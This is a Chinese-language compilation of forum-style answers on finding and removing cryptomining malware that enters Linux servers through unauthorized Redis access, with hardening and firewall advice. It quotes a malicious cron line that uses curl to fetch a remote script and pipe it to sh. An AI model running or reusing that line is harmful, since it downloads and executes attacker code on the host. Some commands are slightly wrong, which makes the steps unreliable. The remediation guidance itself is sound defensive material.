redis漏洞挖矿查杀

❶ 僵尸病毒和挖矿病毒的区别

僵尸病毒，BlueHero是一种会自动传染的蠕虫病毒，它像WannaCry一样从一台机器自动传染到另一台机器，从一个内网感染到另一个内网。基于传播方法的特点，遭受感染的大多是网站服务器以及其所在内网。
挖矿病毒由腾讯御见威胁情报最早报告。近一年来病毒频繁升级，不断增加攻击手法和躲避安全查杀
DDG挖矿病毒(国外称其为Linux.Lady)是一款在Linux系统下运行的恶意挖矿病毒，前期其主要通过ssh爆破，redis未授权访问漏洞等方式进行传播，近年来其更新非常频繁，已经出现多个版本，本次捕获到的是4004版本

❷ 如何用Linux服务器挖矿教程

今天早上起来一看，服务器脚本一个都没有启动!甚是奇怪，远程登录服务器，也是异常的卡，直到最后卡死，只好重新启动服务器!
启动之后没一会又会变卡，越来越卡，top查看进程！不觉又奇怪的进程，因为平常也不经常看！所以自己也搞不明白怎么回事儿！只好到群里问了问，说是被挖矿的挂了木马文件了，是由于redis的漏洞!
后来我自己发现，原来redis远程可以直接登录，原以为redis和mysql不开放登录权限就不会支持远程登录呢，看来是我想多了
看了好长时间才发现一个异常的进程，自启的进程 molibe ！
找到进程位置 ps -ef|grep molibe ;
在tmp目录下，打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下，cat root 查看定时器的执行发现之前脚本都被改了，顾不得删除cron，service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了！但是根本是因为redis漏洞，所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)

❸ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

❹ 中挖矿病毒的表现

故障现象：使用过程中，发现经常有服务无故关闭，登录服务器经检查，发现CPU使用率达到100%。在检测异常进程中，未发现CPU使用率异常的进程（使用 top、htop 以及 ps -aux 进行检查），于是报障。

检测过程：

1.找到他shell脚本对应目录把目录或者文件删除。

2.检查定时任务是否存在挖矿木马文件在定时任务中，避免定时运行挖矿木马文件。

3.添加hosts挖矿病毒访问对应网站，避免二次访问并下载。

4.排查liunx命令是否损坏，如损坏下载"procps-3.2.8"并编译，恢复top等系列命令。

5.检测进程是否异常。

6.排查入侵入口，例如 redis是否存在弱口令，nginx或者apache上面的网站程序是否存在漏洞，并排查下nginx或者apache日志审查漏洞所在处。

7.排查ssh登录日志。

8.把ssh登录切换成秘钥登录。

9.重启服务器，检查是否进程是否正常。

❺ 防火墙怎么配置防挖矿

针对挖矿蠕虫对SSH/RDP等进行暴力破解的攻击方式，云防火墙的基础防御支持常规的暴力破解检测方式，如登录或试错频次阈值计算，对超过试错阈值的行为进行IP限制，还支持在用户的访问习惯、访问频率基线的基础上，结合行为模型在保证用户正常访问不被拦截的同时对异常登录进行限制。
针对一些通用的漏洞利用方式(如利用Redis写Crontab执行命令、数据库UDF进行命令执行等)，云防火墙的基础防御基于阿里云的大数据优势，利用阿里云安全在云上攻防对抗中积累的大量恶意攻击样本，可以形成精准的防御规则，具有极高的准确性。
若您需要开启云防火墙的基础防御，只需要在安全策略->入侵防御->基础防御配置栏勾选基础规则即可，当基础防御开启后，在网络流量分析->IPS阻断分析中可以看到详细的拦截日志。